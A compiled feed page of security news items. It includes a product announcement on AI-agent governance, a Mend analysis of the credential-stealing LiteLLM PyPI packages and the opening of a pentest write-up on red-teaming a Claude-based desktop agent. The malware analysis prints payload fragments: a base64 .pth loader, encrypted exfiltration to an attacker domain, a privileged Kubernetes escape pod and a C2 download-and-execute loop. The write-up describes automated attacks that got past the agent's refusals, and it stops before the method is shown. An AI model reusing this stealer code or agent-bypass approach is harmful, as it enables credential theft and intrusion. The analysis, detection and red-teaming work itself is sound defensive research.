Technology

<div class="hs-featured-image-wrapper"> <a href="https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.sonatype.com/hubfs/blog_grounded_intelligence.jpg" alt="Image of a hexagon shape with yellow outline with an icon representing a human head at the center" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div><p>One experience has become nearly universal a<span style="text-decoration: none;">s </span><a href="https://www.sonatype.com/resources?category=186977656491" style="text-decoration: none;"><span style="color: #1155cc;">AI systems</span></a><span style="text-decoration: none;"> m</span>ove deeper into software development, their confidence when they’re wrong.</p><p><img decoding="async" src="https://track.hubspot.com/__ptq.gif?a=1958393&amp;k=14&amp;r=https%3A%2F%2Fwww.sonatype.com%2Fblog%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale&amp;bu=https%253A%252F%252Fwww.sonatype.com%252Fblog&amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale/" data-a2a-title="Grounded Intelligence Is Key to Safe AI Software Development at Scale"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgrounded-intelligence-is-key-to-safe-ai-software-development-at-scale%2F&amp;linkname=Grounded%20Intelligence%20Is%20Key%20to%20Safe%20AI%20Software%20Development%20at%20Scale" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale">https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale</a> </p>

<p>Entro Security has announced Agentic Governance &amp; Administration (AGA), a new pillar of its platform designed to help security and identity teams govern AI agents and AI access paths across enterprise systems. The company is showcasing AGA at RSA Conference 2026.</p><p>The core problem AGA addresses is one that traditional Identity Governance and Administration (IGA) tools weren’t built to solve. Existing IGA platforms govern people and applications, but agentic AI operates differently. The “user” is often an AI service or locally running agent. Access paths run through non-human identities: tokens, service accounts, API keys, and secrets. And the blast radius is shaped by OAuth scopes, integrations, and automation, not a single human login.</p><p>“Enterprise AI adoption rarely starts with a strategy deck. It starts with a connection,” said Itzik Alvas, Co-Founder and CEO of Entro Security. “A developer connects a tool to an LLM, a team installs an AI app in SaaS, or someone authenticates an agent against SharePoint, GitHub, Salesforce, or internal APIs. It works, spreads fast, and then security teams get questions they can’t answer fast enough. Who connected what, to which systems, with what permissions, and using which identities? Our AGA helps teams regain clarity and control as AI access becomes the default.”</p><p>AGA applies the same governance fundamentals that IAM teams already know, adapted for a world where agents connect in seconds, operate continuously, and drift as adoption spreads. The capability covers inventory, ownership, least privilege, auditability, and enforcement, applied to AI assistants, agent platforms, and locally running agents.</p><p>On the technical side, AGA builds a structured profile for each AI agent by pulling from three layers: sources (endpoint telemetry, agent foundries, cloud environments, MCP servers), targets (enterprise assets and applications the agent touches), and identities (human, non-human, or secret identities used to access those targets).</p><p>Two core capabilities sit on top of that foundation. Shadow AI Discovery uses EDR integrations to surface AI clients and local agent runtimes on workstations, and connects natively with agent foundries including AWS Bedrock and Copilot Studio to discover agents and the non-human identities they rely on. AI Agents Monitoring and Enforcement adds MCP activity visibility and policy controls, giving teams audit trails of allowed and blocked activity and controls to reduce sensitive data and secret exposure.</p><p>AGA is available now as part of the Entro platform.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/entro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise/" data-a2a-title="Entro Security Launches AGA to Govern AI Agents and Non-Human Identities Across the Enterprise"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fentro-security-launches-aga-to-govern-ai-agents-and-non-human-identities-across-the-enterprise%2F&amp;linkname=Entro%20Security%20Launches%20AGA%20to%20Govern%20AI%20Agents%20and%20Non-Human%20Identities%20Across%20the%20Enterprise" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

Mel Schilling emerged as one of Australian television's most recognisable relationship experts. On Tuesday, she died of bowel cancer at the age of 54. As a judge on the hit reality show Married At … [+5692 chars]

Newcastle Australias newly launched Master of Cyber Security currently offered part-time is designed to build that breadth and depth. The programme prepares professionals for roles such as security a… [+1859 chars]

<p><strong>Last Updated:</strong> March 24, 2026 – 1:15 PM ET</p><p>Part 1 covered CanisterWorm, the self-spreading npm worm. This post covers the next wave: a malicious LiteLLM PyPI package carrying the most capable credential stealer TeamPCP has deployed yet.</p><p>On March 24, 2026, two versions of <code>litellm</code>, one of the most widely used Python libraries for working with AI language model APIs, were published to PyPI carrying a hidden credential stealer. Versions <code>1.82.7</code> and <code>1.82.8</code> never appeared on the official LiteLLM GitHub repository. They were published directly to PyPI using credentials stolen from a maintainer account, which TeamPCP obtained as part of their ongoing cascade of supply chain compromises.</p><h2 class="wp-block-heading" id="how-teampcp-got-into-litellm"><strong>How TeamPCP got into LiteLLM</strong></h2><p>To understand this attack you need to follow the credential chain back four days.</p><p>On March 19, TeamPCP force-pushed malicious commits over 75 of 76 version tags of <code>aquasecurity/trivy-action</code> and poisoned Trivy release <code>v0.69.4</code>. Any CI/CD pipeline that ran Trivy that day had its secrets harvested and exfiltrated to the attacker.</p><p>LiteLLM’s CI pipeline (<code>ci_cd/security_scans.sh</code>) installed Trivy via apt without pinning a version. When the pipeline ran on March 23, it pulled the poisoned Trivy build. The stealer inside Trivy ran inside LiteLLM’s CI environment, collected everything, including <code>PYPI_PUBLISH_PASSWORD</code> for the krrishdholakia maintainer account, and shipped it to <code>checkmarx.zone</code>.</p><p>On March 23, TeamPCP also compromised <code>checkmarx/kics-github-action</code> (all 35 tags hijacked) and <code>checkmarx/ast-github-action</code> (version 2.3.28 poisoned), expanding their credential collection to every pipeline that used Checkmarx scanning. The litellm.cloud domain was registered the same day.</p><p>By March 24 they had everything they needed. Two malicious LiteLLM versions hit PyPI within hours of each other.</p><h2 class="wp-block-heading" id="what-changed-between-1-82-7-and-1-82-8"><strong>What changed between 1.82.7 and 1.82.8</strong></h2><p>The two versions represent a deliberate escalation in how the payload triggers.</p><p><strong>Version 1.82.7</strong> hid the malicious code inside <code>litellm/proxy/proxy_server.py</code>. The payload only ran when a developer or application explicitly imported <code>litellm.proxy</code>, a common path when running the LiteLLM proxy server, but not universal.</p><p><strong>Version 1.82.8</strong> moved the same payload into a file named <code>litellm_init.pth</code> placed in the package’s site-packages directory. This changes everything. Python’s site module processes every .pth file in site-packages on startup, executing any line that begins with <code>import</code>. No import statement is needed in application code. No user interaction. <strong>The payload fires every time Python starts on the infected machine</strong>, regardless of whether LiteLLM is ever used.</p><p>The upgrade from a module-level hook to a <code>.pth</code>-level hook is significant: it means the malware persists and re-runs even after the malicious package is uninstalled, as long as the <code>.pth</code> file remains in site-packages.</p><h2 class="wp-block-heading" id="technical-analysis"><strong>Technical analysis</strong></h2><h3 class="wp-block-heading" id="three-layers-one-goal"><strong>Three layers, one goal</strong></h3><p>The payload uses three nested layers of base64 encoding to obscure its code from static scanners.</p><pre class="wp-block-code"><code>import os, subprocess, sys; subprocess.Popen([sys.executable, "-c",   "import base64; exec(base64.b64decode('&lt;blob&gt;'))"],   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)</code></pre><p>_{<strong>Figure 1:</strong> Outer <code>.pth</code> execution — fires on every Python startup with no user action}</p><p>Decoding the blob reveals the orchestrator script, which holds an embedded RSA-2048 public key and a second base64-encoded payload (the harvester). The orchestrator runs the harvester as a subprocess, captures everything it prints to stdout, encrypts the output, and ships it out.</p><pre class="wp-block-code"><code>subprocess.run(["openssl", "rand", "-out", sk, "32"]) subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected,     "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"]) subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin",     "-inkey", pk, "-in", sk, "-out", ek,     "-pkeyopt", "rsa_padding_mode:oaep"]) # bundles as tpcp.tar.gz, POSTs to models.litellm.cloud</code></pre><p>_{<strong>Figure 2:</strong> Encryption and exfiltration pipeline — output is encrypted before leaving the machine}</p><p>The data is AES-256-CBC encrypted with a random session key. The session key is RSA-OAEP encrypted with the attacker’s public key. Only the attacker can decrypt what was stolen. The archive is named <code>tpcp.tar.gz</code>, a direct self-reference by TeamPCP.</p><h3 class="wp-block-heading" id="the-credential-harvester"><strong>The credential harvester</strong></h3><p>The second-stage script is an exhaustive credential collector. In plain terms: it reads every file on the system that could contain a password, token, or private key, and sends all of it.</p><p>It specifically targets:</p><ul class="wp-block-list"> <li><strong>SSH keys</strong> – all key types, authorized_keys, known_hosts, host keys from<code> /etc/ssh</code></li> <li><strong>AWS credentials</strong> – environment variables, <code>~/.aws/credentials</code>, and live queries to the EC2 Instance Metadata Service (IMDS) to steal IAM role credentials</li> <li><strong>Kubernetes</strong> – service account tokens, <code>~/.kube/config</code>, all secrets across all namespaces via the K8s API</li> <li><strong>GCP and Azure</strong> – application default credentials, <code>~/.azure</code> directory contents</li> <li><strong>Docker</strong> – <code>config.json</code> including registry tokens, Kaniko build credentials</li> <li><strong>npm tokens</strong> – <code>~/.npmrc</code> (connecting directly to the npm side of this campaign)</li> <li><strong>Database configs</strong> – <code>.pgpass, .my.cnf, redis.conf, .mongorc.js</code></li> <li><strong>Environment files</strong> – <code>.env, .env.production, .env.staging</code> searched recursively to depth 6 across <code>/home, /opt, /srv, /var/www, /app, /data, /tmp</code></li> <li><strong>Cryptocurrency wallets</strong> — Bitcoin, Ethereum keystores, Solana validator keypairs, Cardano signing keys, Zcash, Ripple, Litecoin, Dogecoin</li> <li><strong>TLS/SSL private keys</strong> — <code>*.pem, *.key, *.p12, *.pfx</code>, Let’s Encrypt certs</li> <li><strong>CI/CD secrets</strong> — <code>terraform.tfvars, terraform.tfstate</code>, Jenkinsfile, <code>.travis.yml, .gitlab-ci.yml, .drone.yml</code></li> <li><strong>System information</strong> — hostname, username, full <code>printenv, /etc/passwd, /etc/shadow</code>, SSH login history</li> </ul><p>It also queries the AWS Secrets Manager and SSM Parameter Store directly using any AWS credentials it finds.</p><h3 class="wp-block-heading" id="kubernetes-cluster-escape"><strong>Kubernetes cluster escape</strong></h3><p>If the infected machine is running inside a Kubernetes pod with a service account token at <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>, the harvester escalates:</p><pre class="wp-block-code"><code>pod_manifest = {     'spec': {         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}]     } } k8s_post('/api/v1/namespaces/kube-system/pods', pod_manifest)</code></pre><p>_{<strong>Figure 3:</strong> Privileged pod manifest deployed to every cluster node, mounts the host filesystem via chroot}</p><p>It enumerates every node in the cluster and deploys this pod to each one. The pod mounts <code>/</code> from the host and uses <code>chroot</code> to install the backdoor directly onto the underlying node, outside the container boundary.</p><h3 class="wp-block-heading" id="persistence-backdoor"><strong>Persistence backdoor</strong></h3><p>After exfiltration, the harvester drops a polling backdoor to <code>~/.config/sysmon/sysmon.py</code> and registers it as a systemd user service (<code>sysmon.service</code>). The backdoor checks <code>https://checkmarx.zone/raw</code> every 50 minutes for a URL, downloads whatever binary it points to, writes it to <code>/tmp/pglog</code>, and executes it.</p><pre class="wp-block-code"><code>C_URL   = "https://checkmarx.zone/raw" TARGET  = "/tmp/pglog" STATE   = "/tmp/.pg_state" time.sleep(300)   # 5-minute sandbox evasion delay while True:     l = g()       # fetch URL from C2     if l and l != prev and "youtube.com" not in l:         e(l)      # download and execute     time.sleep(3000)</code></pre><p>_{<strong>Figure 4:</strong> C2 polling loop with YouTube kill-switch — identical logic to CanisterWorm’s pgmon backdoor}</p><p>The <code>youtube.com</code> kill-switch, the <code>/tmp/pglog</code> target path, the <code>/tmp/.pg_state</code> state file, and the 300/3000 second timing are <strong>identical</strong> to the backdoor deployed by CanisterWorm on npm. This is the same codebase, the same actor.</p><h2 class="wp-block-heading" id="attribution-same-actor-bigger-payload"><strong>Attribution: Same actor, bigger payload</strong></h2><p>The connection to TeamPCP and CanisterWorm is direct:</p><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Indicator</strong></th> <th><strong>This malware</strong></th> <th><strong>CanisterWorm (npm)</strong></th> </tr> </thead> <tbody> <tr> <td>Exfil archive</td> <td><code>tpcp.tar.gz</code></td> <td>actor name “TeamPCP”</td> </tr> <tr> <td>C2 state file</td> <td><code>/tmp/.pg_state</code></td> <td><code>/tmp/.pg_state</code></td> </tr> <tr> <td>C2 payload target</td> <td><code>/tmp/pglog</code></td> <td><code>/tmp/pglog</code></td> </tr> <tr> <td>Backdoor poll interval</td> <td>3000 seconds</td> <td>3000 seconds</td> </tr> <tr> <td>Startup delay</td> <td>300 seconds</td> <td>300 seconds</td> </tr> <tr> <td>Kill-switch</td> <td><code>youtube.com not in url</code></td> <td><code>youtube.com not in url</code></td> </tr> <tr> <td>Persistence mechanism</td> <td>systemd user service</td> <td>systemd user service</td> </tr> </tbody> </table> </figure><p>The LiteLLM payload is a significant capability upgrade over CanisterWorm. Where CanisterWorm’s Python backdoor slot held a placeholder (<code>hello123</code>), this is the real thing, a production-grade stealer with AWS API integration, K8s cluster escape, cryptocurrency wallet enumeration, and RSA-encrypted exfiltration.</p><h2 class="wp-block-heading" id="indicators-of-compromise"><strong>Indicators of compromise</strong></h2><h3 class="wp-block-heading" id="network"><strong>Network</strong></h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Indicator</strong></th> <th><strong>Purpose</strong></th> </tr> </thead> <tbody> <tr> <td><code>hxxps://models.litellm[.]cloud/</code></td> <td>Exfiltration endpoint</td> </tr> <tr> <td><code>hxxps://checkmarx[.]zone/raw</code></td> <td>C2 polling for payload URL</td> </tr> <tr> <td><code>hxxp://169.254.169.254/latest/meta-data/iam/security-credentials/</code></td> <td>AWS IMDS credential theft</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="filesystem"><strong>Filesystem</strong></h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Path</strong></th> <th><strong>Description</strong></th> </tr> </thead> <tbody> <tr> <td><code>~/.config/sysmon/sysmon.py</code></td> <td>Persistent C2 backdoor</td> </tr> <tr> <td><code>~/.config/systemd/user/sysmon.service</code></td> <td>Systemd persistence unit</td> </tr> <tr> <td><code>/tmp/pglog</code></td> <td>Downloaded payload binary</td> </tr> <tr> <td><code>/tmp/.pg_state</code></td> <td>C2 state tracking</td> </tr> <tr> <td><code>litellm_init.pth</code> in site-packages</td> <td>Malicious <code>.pth</code> loader (v1.82.8)</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="kubernetes"><strong>Kubernetes</strong></h3><ul class="wp-block-list"> <li>Pods named <code>node-setup-*</code> in namespace <code>kube-system</code></li> <li>Created with <code>hostPID: true, hostNetwork: true, privileged: true</code></li> </ul><h3 class="wp-block-heading" id="cryptographic"><strong>Cryptographic</strong></h3><ul class="wp-block-list"> <li>RSA-2048 attacker public key fingerprint (embedded in payload): <code>vahaZDo8mucujrT15ry+08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0...</code></li> </ul><h2 class="wp-block-heading" id="detection"><strong>Detection</strong></h2><h3 class="wp-block-heading" id="check-for-active-infection">Check for active infection</h3><pre class="wp-block-code"><code># Check for backdoor service systemctl --user status sysmon.service # Check for backdoor script and C2 artifacts ls -la ~/.config/sysmon/sysmon.py ls -la ~/.config/systemd/user/sysmon.service ls -la /tmp/pglog /tmp/.pg_state # Check for malicious .pth in all Python environments find $(python3 -c "import site; print('\n'.join(site.getsitepackages()))") \ -name "*.pth" | xargs grep -l "subprocess.Popen" 2&gt;/dev/null # Check for K8s escape pods kubectl get pods -n kube-system | grep node-setup</code></pre><p>_{<strong>Figure 5:</strong> Detection commands for the sysmon backdoor and associated artifacts}</p><h3 class="wp-block-heading" id="remove-the-backdoor"><strong>Remove the backdoor</strong></h3><pre class="wp-block-code"><code>systemctl --user stop sysmon.service systemctl --user disable sysmon.service rm -f ~/.config/systemd/user/sysmon.service rm -rf ~/.config/sysmon/ rm -f /tmp/pglog /tmp/.pg_state systemctl --user daemon-reload # Remove malicious .pth file pip uninstall litellm # also manually verify .pth is gone from site-packages</code></pre><p>_{<strong>Figure 6:</strong> Remediation steps for infected hosts}</p><h3 class="wp-block-heading" id="rotate-credentials-immediately"><strong>Rotate credentials immediately</strong></h3><p>Any machine that had Python start with <code>litellm</code> 1.82.7 or 1.82.8 installed must be treated as fully compromised. Rotate: AWS IAM keys, SSH keys, npm tokens, database passwords, Kubernetes service account tokens, Docker registry credentials, and any cloud provider credentials present in environment variables or config files.</p><h2 class="wp-block-heading" id="conclusion"><strong>Conclusion</strong></h2><p>The LiteLLM attack is the third major wave in TeamPCP’s March 2026 campaign. Trivy provided initial access. CanisterWorm spread through the npm ecosystem. Now a malicious PyPI package reaches a different but overlapping audience: AI and ML developers who use LiteLLM to integrate language models into applications. These pipelines routinely have access to cloud credentials, model API keys, and production infrastructure.</p><p>The upgrade from npm to PyPI, and from module-level hooks to <code>.pth</code> auto-execution, shows an actor that is actively evolving their delivery mechanisms across ecosystems while keeping the same core payload and infrastructure.<br>PyPI has quarantined the affected versions. If you are running LiteLLM, verify your installed version (<code>pip show litellm</code>) and upgrade to a clean release. If you were running 1.82.7 or 1.82.8 at any point, assume compromise and rotate all credentials.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/teampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer/" data-a2a-title="TeamPCP Supply Chain Attack Part 2: LiteLLM PyPI Credential Stealer"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/teampcp-supply-chain-series-part-2/">https://www.mend.io/blog/teampcp-supply-chain-series-part-2/</a> </p>

<div data-elementor-type="wp-post" data-elementor-id="10919" class="elementor elementor-10919" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c6eba17 e-con-full e-flex e-con e-parent" data-id="c6eba17" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737af17 elementor-widget elementor-widget-text-editor" data-id="737af17" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>During a recent penetration test, we came across an AI-powered desktop application that acted as a bridge between Claude (Opus 4.5) and a third-party asset management platform. The idea is simple: instead of clicking through dashboards and making API calls, users just ask the agent to do it for them. “How many open tickets do we have?” “Update this record.” That kind of thing.</p> <p>The agent ran inside a sandboxed environment, and the client was confident in their controls. Rigid system prompts (even prepended to each message), deterministic hooks in place to prevent accidental disclosure, and so on. To their credit, those controls held up; we just found another way to do what we wanted.</p> <h3><strong>Automating the Recon</strong></h3> <p><a id="_Hlk224913142"></a>Manual LLM testing is a drag. You’re sitting there typing prompts one at a time, waiting for responses, trying to keep track of what worked and what didn’t. It’s tedious, and it doesn’t scale.</p> <p>Our go-to approach is to get another LLM to do the dirty work. For this engagement, the target was accessible via an Electron desktop application, meaning you could launch it in debug mode and access the app’s DOM tree directly. We wrote a Python script that could interact with the target directly, gave it to Claude (alongside our <a href="https://github.com/praetorian-inc/augustus/">Augustus LLM testing methodology</a>), and let it run.</p> <p>This essentially meant we had Claude talking to another version of itself. Back and forth, hundreds of times, working through the Augustus attack paths automatically:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f626292 e-con-full e-flex e-con e-parent" data-id="f626292" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-639fe4d elementor-widget elementor-widget-image" data-id="639fe4d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img fetchpriority="high" decoding="async" width="1224" height="241" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp" class="attachment-full size-full wp-image-10911" alt="Terminal showing Python script execution where AI refuses PowerPoint creation request, followed by thinking notes about the refusal" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-1024x202.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-768x151.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-839c426 e-con-full e-flex e-con e-parent" data-id="839c426" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-22a0e32 elementor-widget elementor-widget-text-editor" data-id="22a0e32" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This kind of automated LLM-on-LLM testing saved us an immense amount of effort on this engagement. It’s exactly why we’ve been building tools like <a href="https://github.com/praetorian-inc/julius">Julius</a> (for fingerprinting AI services) and Augustus, which we’ve recently added to our Guard platform. If the attack surface keeps growing, the testing efficiency has to keep up.</p> <h3><strong>Discovering Weaknesses</strong></h3> <p>After a couple hours of this, patterns started to emerge. The agent had strong restrictions on most dangerous operations; ask it to run a bash command or write a shell script and it would refuse.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dbe2500 e-con-full e-flex e-con e-parent" data-id="dbe2500" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f46e27a elementor-widget elementor-widget-image" data-id="f46e27a" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="208" src="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp" class="attachment-full size-full wp-image-10912" alt="Screenshot of a chat interface showing user asking 'Ls the files in /app/worker' and AI responding it cannot help with that request" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-300x51.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-1024x174.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-768x131.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-36a274d e-con-full e-flex e-con e-parent" data-id="36a274d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c9b6cfe elementor-widget elementor-widget-text-editor" data-id="c9b6cfe" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>However, it really liked “Hello World” programs. 